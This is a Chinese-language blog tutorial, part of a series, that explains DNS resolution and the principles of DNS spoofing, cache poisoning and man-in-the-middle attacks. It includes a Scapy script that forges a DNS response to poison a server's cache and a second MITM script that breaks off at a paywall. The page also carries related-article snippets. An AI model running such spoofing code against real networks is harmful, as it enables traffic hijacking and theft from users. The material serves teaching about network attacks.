ARP欺骗技术:DNS欺骗与HTTP重定向_(6).DNS欺骗原理与机制

最新推荐文章于 2024-11-14 22:45:28 发布
最新推荐文章于 2024-11-14 22:45:28 发布
阅读量1.1k 收藏 11
点赞数 27
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: http 网络协议 网络 性能优化 ARP欺骗技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chenlz2007/article/details/143782672

DNS欺骗原理与机制

DNS(Domain Name System,域名系统)是互联网中用于将域名转换为IP地址的系统。DNS欺骗(DNS Spoofing或DNS Cache Poisoning)是一种网络攻击技术,攻击者通过修改DNS服务器的缓存记录,使用户访问错误的IP地址,从而达到劫持用户流量、传播恶意软件或进行中间人攻击的目的。

在这里插入图片描述

DNS协议简介

DNS协议是一种基于UDP的协议,主要工作在应用层。DNS的主要功能是将易于记忆的域名转换为网络设备所需的IP地址。DNS解析过程通常涉及以下几个步骤:

  1. 递归查询:客户端向本地DNS服务器发起查询请求,本地DNS服务器负责递归查询,直到找到正确的IP地址。

  2. 迭代查询:DNS服务器向其他DNS服务器发起查询请求,获取相关信息。

  3. 缓存:DNS服务器将查询结果缓存一段时间,以提高后续查询的效率。

DNS解析过程

假设用户想要访问 example.com,解析过程如下:

  1. 客户端发起请求:客户端向本地DNS服务器发送一个DNS查询请求,询问 example.com 的IP地址。

  2. 本地DNS服务器查询:如果本地DNS服务器的缓存中没有 example.com 的记录,它会向根DNS服务器发起查询。

  3. 根DNS服务器响应:根DNS服务器返回一个顶级域名(TLD)服务器的地址。

  4. TLD服务器查询:本地DNS服务器向TLD服务器发送查询请求。

  5. TLD服务器响应:TLD服务器返回权威DNS服务器的地址。

  6. 权威DNS服务器查询:本地DNS服务器向权威DNS服务器发送查询请求。

  7. 权威DNS服务器响应:权威DNS服务器返回 example.com 的IP地址。

  8. 缓存结果:本地DNS服务器将获取到的IP地址缓存,并返回给客户端。

  9. 客户端访问:客户端使用获取到的IP地址访问 example.com

DNS欺骗的基本原理

DNS欺骗的核心在于利用DNS协议的弱点,尤其是缓存机制,来篡改DNS解析结果。攻击者通过以下几种方式实现DNS欺骗:

  1. 缓存污染:攻击者向DNS服务器发送伪造的DNS响应,使DNS服务器缓存错误的IP地址。

  2. 中间人攻击:攻击者在DNS请求和响应的过程中插入自己,篡改DNS响应数据。

  3. 源端口预测:攻击者通过预测DNS请求的源端口,发送伪造的DNS响应,使DNS服务器接受错误的解析结果。

缓存污染

缓存污染是DNS欺骗中最常见的方式。攻击者向DNS服务器发送伪造的DNS响应,使其缓存错误的IP地址。一旦DNS服务器缓存了错误的记录,后续对该域名的查询都会返回错误的IP地址。

例子:使用Scapy进行DNS缓存污染

假设攻击者想要将 example.com 的IP地址篡改为 192.168.1.100。可以使用Scapy库来实现这个过程。


from scapy.all import *



# 目标DNS服务器的IP地址

target_dns_server = "192.168.1.1"

# 要篡改的域名

target_domain = "example.com"

# 伪造的IP地址

fake_ip = "192.168.1.100"



# 创建一个DNS查询包

dns_query = IP(dst=target_dns_server)/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname=target_domain))



# 发送查询包并接收响应

response = sr1(dns_query, verbose=0)



# 提取查询ID

query_id = response[DNS].id



# 创建一个伪造的DNS响应包

dns_response = IP(dst=target_dns_server)/UDP(dport=53)/DNS(id=query_id, qr=1, an=DNSRR(rrname=target_domain, ttl=60, rdata=fake_ip))



# 发送伪造的DNS响应包

send(dns_response, verbose=0)



print(f"DNS缓存污染成功,{
     
     target_domain} 的IP地址被篡改为 {
     
     fake_ip}")

中间人攻击

中间人攻击(Man-in-the-Middle,MITM)是指攻击者在客户端和DNS服务器之间插入自己,篡改DNS响应数据。这种方式需要攻击者能够控制客户端和DNS服务器之间的网络通信。

例子:使用Scapy进行中间人攻击

假设攻击者已经通过ARP欺骗控制了客户端和DNS服务器之间的通信。可以使用Scapy库来监听DNS查询并发送伪造的DNS响应。


from scapy.all import *



# 目标DNS服务器的IP地址

target_dns_server = "192.168.1.1"

# 要篡改的域名

target_domain =
最低0.47元/天 解锁文章

200万优质内容无限畅学
dns重定向_[Network] 1- DNS解析
weixin_39939993的博客
11-29 915
LIN.JY666:[Network] 8 - 如果你的域名被劫持 / DNS解析失败 你能怎么办?​zhuanlan.zhihu.com1. DNS解析寻找哪台机器上有你需要资源的过程。为什么要DNS解析? 域名方便记忆, 一个域名对应多个IP地址。DNS解析: 一个网址域名地址 到 IP地址 的转换。2.1 DNS递归/迭代查询过程访问www.google.com 1. if [浏览器 ...
DNS解析过程及欺骗原理
sjp_1996的博客
05-05 2716
什么是DNS DNS即地址解析协议,域名系统以分布式数据库的形式将域名和IP地址相互映射。 解析过程: 假如我们要访问 www.baidu.com ,首先要向本地DNS服务器发出DNS请求,查询 www.baidu.com 的IP地址; 如果本地DNS服务器没有在自己的DNS缓存表中发现该网址的记录,就会向根服务器发起查询,根服务器收到请求后,将com域服务器的地址返回给本地DNS服务器; 本地DNS服务器则继续向com域发出查询请求,域服务器将 baidu.com 授权域名服务器的地址返回给本地DNS服务
DNS欺骗原理
米莱虾
09-01 2371
用伪装的DNS服务器截获请求域名的IP,再发送给伪装的web服务器。查询特定域名的IP时,将得到伪造的IP,打开事先准备好的虚假页面
fakedns了解吗?
lydstory123的专栏
09-07 1559
https://github.com/pathes/fakedns python3 dns server? udp 协议 做的啥?
浅谈DNS-rebinding
蚁景网安学院
04-12 817
为啥突然要总结一下这个很老的知识点,我也不知道,可能太菜了,闲下来总得学点什么~DNS Rebinding0x01 攻击简介DNS Rebinding也叫做DNS重绑定攻击或者DNS重定向攻击。在这种攻击中,恶意网页会导致访问者运行客户端脚本,攻击网络上其他地方的计算机。在介绍DNS Rebinding攻击机制之前我们先了解一下Web同源策略,Web同源策略同源策略(英语:Same-origin ...
ARP欺骗技术DNS欺骗HTTP重定向.docxARP欺骗技术DNS欺骗HTTP重定向all.docxARP欺骗技术DNS欺骗HTTP重定向-(10).HTTP重定向原理机制.doc
08-31
ARP欺骗技术DNS欺骗HTTP重定向_(10).HTTP重定向原理机制.docx ARP欺骗技术DNS欺骗HTTP重定向_(11).HTTP重定向的攻击方法.docx ARP欺骗技术DNS欺骗HTTP重定向_(12).HTTP重定向的防御措施.docx ...
ARP欺骗技术DNS欺骗HTTP重定向_(13).ARP欺骗DNS欺骗结合攻击
最新发布
chenlz2007的博客
11-14 761
ARP协议用于将IP地址解析为物理(MAC)地址。在网络中,每个设备都有一个唯一的MAC地址,而IP地址则是用于网络层通信的地址。当一个设备需要另一个设备通信时,它会发送一个ARP请求,询问目标IP地址对应的MAC地址。目标设备收到请求后,会发送一个ARP响应,告知自己的MAC地址。DNS(Domain Name System)协议用于将域名解析为IP地址。当用户访问一个网站时,浏览器会向DNS服务器发送查询请求,DNS服务器会返回相应的IP地址。ettercap。
ARP欺骗技术DNS欺骗HTTP重定向_(2).ARP欺骗原理机制
chenlz2007的博客
11-14 1559
ARP(Address Resolution Protocol)协议是用于将IP地址解析为物理地址(通常是MAC地址)的协议。在网络中,计算机之间进行通信时,需要知道对方的MAC地址来构建数据帧。ARP协议通过广播请求和单播响应的方式,实现了从IP地址到MAC地址的动态映射。ARP协议在RFC 826中定义,主要用于IPv4网络
ARP欺骗技术DNS欺骗HTTP重定向_(5).DNS欺骗技术概述
chenlz2007的博客
11-14 832
DNS(Domain Name System,域名系统)是互联网的一项核心服务,用于将人类可读的域名(如www.example.com)转换为计算机可识别的IP地址(如192.168.1.1)。DNS协议主要通过UDP(User Datagram Protocol)在53端口进行通信,也可以通过TCP在53端口进行通信。
fake-dns:手机不root改dns
05-17
fake-dns 第0步 开启vagrant虚拟机,该虚拟机ip地址为192.168.1.168,该虚拟机提供对域名my-domain.test的网页服务 第1步 宿主机运行下面这个python进行fake dns,宿主机ip是192.168.1.122 import socket class DNSQuery: def __init__(self, data): self.data=data self.dominio='' tipo = (ord(data[2]) >> 3) & 15 # Opcode bits if tipo == 0: # Standard query ini=12 lon=ord(data[ini]) while lon != 0:
DNS劫持原理操作
热门推荐
点点的博客
08-24 6万+
DNS(域名系统)的作用是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。
常见的DNS攻击相应的防御措施
qq_32044265的博客
04-13 3000
重点介绍安全领域比较常见的一些DNS攻击以及相应的防御措施:DNS Request Flood攻击防御,DNS Reply Flood攻击防御和DNS缓存投毒攻击防御。
DNS欺骗攻击Python实现
Javachichi的博客
11-18 850
DNS欺骗攻击的原理就是攻击者伪装成DNS服务器,向受害者发送虚假的DNS响应,告诉受害者请求的域名对应的IP地址是攻击者自己控制的恶意网站的IP地址。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNS解析原理知识总结
zhx111111111的博客
02-27 1821
DNS相关知识总结分析
什么是DNS欺骗
余十步的博客
07-10 1040
DNS欺骗DNS Spoofing),也称为DNS缓存中毒(DNS Cache Poisoning),是一种网络攻击形式,攻击者通过操纵DNS记录,将用户重定向到一个伪造的、恶意的网站。这些恶意网站可能看起来用户想要访问的合法网站非常相似,从而欺骗用户输入登录凭据或其他敏感信息。
DNS原理介绍
石臻臻的杂货铺(szzdzhp001)
07-04 2万+
到底什么是DNS?
DNS原理及解析详情
Welkin_qing的博客
08-28 2202
文章目录域名结构 域名结构 通常称www.example.com.cn为一个域名,但是从严格意义上来看example.com.cn才是一个域名 域名需要从右往左来看 每一个域名后面都有一个root表示根域名 根域名:以.表示,由多台DNS服务器组成,由不同机构管理 顶级域名:由数台DNS服务器组成,实现组织机构分类管理 二级域名:可供组织机构申请使用,必须先申请成功后才可以使用,比如:ab...
DNS欺骗技术原理安全防范技术
03-02 2455
 转:http://241072.blog.51cto.com/231072/54307概述:什么是DNS欺骗DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入www.google.com的网址然后回车。那么在这背后又有什么事情正在进行着呢?一般而言,你的浏览器将会向DNS服务器发送一个
dns+重定向
htjx99的专栏
03-24 4470
原文网址:http://www.chinaz.com/web/2011/0413/171908.shtml 其实这个文章叫大型网站用户定位技术,其实今天要讲的不是智能 DNS ,今天是要讲的智能 DNS 的问题,和一些网站对这个的处理,下面要讲的这个技术主要是针对比较大的文件,比如下载和视频之类。为什么要讲这个,主要是我的群中一些朋友吵着想了解一下。我答应了非常非常久了。直到现在才有时间给大
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值